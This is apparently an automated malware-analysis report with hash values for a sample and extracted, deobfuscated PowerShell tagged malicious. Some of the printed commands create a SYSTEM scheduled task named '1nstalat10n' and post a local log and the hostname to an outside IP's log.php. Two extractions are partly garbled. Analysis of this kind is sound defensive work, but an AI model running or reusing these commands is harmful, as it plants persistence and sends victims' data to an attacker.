|
Hash | Hash Value |
|---|---|
| MD5 | 549b9c352976896bee533ceea5f27395
|
| Sha1 | d00bd63040786db48525285421f97ba768225537
|
| Sha256 | 3879e4ecf84ca8e3cb38c0e3d800f2c937d89fdbabf9133f35be75357151e14c
|
| Sha384 | 990a7de4848171c2274c201609a5a03e6c97fd774fda4e86870ccacd241d4edacf5faa93461d16bbf137b23ea432ddc8
|
| Sha512 | a26454486fd87f76da853ef3a0aafb69acd8c742630935ff4337d040c8fc4c047e41835472d921ae14797bcb24b9bb5fefd09e5997e956e10a62070511660e19
|
| SSDeep | 384:CzY+DulnUHA7ticeToW3T1XFFM69q5ICpV1XFFM6ztcq5ICVbi:+IhQstic6hRjqmCpz56qmC
|
| TLSH | C403E65BB3509331E44103314A6FC7E56F74AC849FA25616327AF34C6E31AD066E7EE2
|
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | ^ /sc "onstart" "^" /delay "0001:00" "^" /ru "SYSTEM" "^" /f :: "=====" "RUN" "TASK" "NOW" "=====" Write-Output "Running" "task" "now" schtasks "/run" "/tn" "1nstalat10n" Write-Output "BAT" "finished" Write-Output "Sending" "BAT" "logebula/run" ":" "T" "fi???????????????AS" Write-Output "BAT" "finitRu>>" "??????????????" "=" "aho" "r??????????????" " " "P" "f" "?????" " " "eo" "??????????" "=" ".R" "r???????????or" "Green" >> "aho r????????????oebPT!" "ec" "t" "o" "==" "????????????????" "??????????" "n" "SilentlyContR" "SilentlyContinu" "t" "at" "." "Silen" "e n " "d?????????" "????" "lyP /i??R om } >> !SCRIPR" "Silen" "e neP !SCR.m" |
| Deobfuscated PowerShell | ^ /sc "onstart" "^" /delay "0001:00" "^" /ru "SYSTEM" "^" /f :: "=====" "RUN" "TASK" "NOW" "=====" Write-Output "Running" "task" "now" schtasks "/run" "/tn" "1nstalat10n" Write-Output "BAT" "finished" Write-Output "Sending" "BAT" "log" "to" "server..." echo. ipconfig echo. powershell -Command "^" "Invoke-WebRequest -Uri 'http://45.61.130.146/log.php' -Method Post -Body @{log=(Get-Content 'C:\InstallNebula_bat.log' -Raw); hostname=$env:COMPUTERNAME} -ContentType 'application/x-www-form-urlencoded'" ^ >> "%BAT_LOG%" exit |
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | ^ /sc "onstart" "^" /delay "0001:00" "^" /ru "SYSTEM" "^" /f :: "=====" "RUN" "TASK" "NOW" "=====" Write-Output "Running" "task" "now" schtasks "/run" "/tn" "1nstalat10n" Write-Output "BAT" "finished" Write-Output "Sending" "BAT" "logebula/run" ":" "T" "fi???????????????AS" Write-Output "BAT" "finitRu>>" "??????????????" "=" "aho" "r??????????????" " " "P" "f" "?????" " " "eo" "??????????" "=" ".R" "r???????????or" "Green" >> "aho r????????????oebPT!" "ec" "t" "o" "==" "????????????????" "??????????" "n" "SilentlyContR" "SilentlyContinu" "t" "at" "." "Silen" "e n " "d?????????" "????" "lyP /i??R om } >> !SCRIPR" "Silen" "e neP !SCR.m" Malicious |
549b9c352976896bee533ceea5f27395 > filmJytTOF_2Xf_D8xmvHCZGa_QdAg > [PowerShell Command] > [PowerShell Command] > [PowerShell Command] > [PowerShell Command] > [PowerShell Command] |
| Deobfuscated PowerShell | ^ /sc "onstart" "^" /delay "0001:00" "^" /ru "SYSTEM" "^" /f :: "=====" "RUN" "TASK" "NOW" "=====" Write-Output "Running" "task" "now" schtasks "/run" "/tn" "1nstalat10n" Write-Output "BAT" "finished" Write-Output "Sending" "BAT" "log" "to" "server..." echo. ipconfig echo. powershell -Command "^" "Invoke-WebRequest -Uri 'http://45.61.130.146/log.php' -Method Post -Body @{log=(Get-Content 'C:\InstallNebula_bat.log' -Raw); hostname=$env:COMPUTERNAME} -ContentType 'application/x-www-form-urlencoded'" ^ >> "%BAT_LOG%" exit Malicious |
549b9c352976896bee533ceea5f27395 > Root Entry > 䄦㡥䆾䅤 > filmJytTOF_2Xf_D8xmvHCZGa_QdAg > [PowerShell Command] > [PowerShell Command] > [PowerShell Command] > [PowerShell Command] > [PowerShell Command] |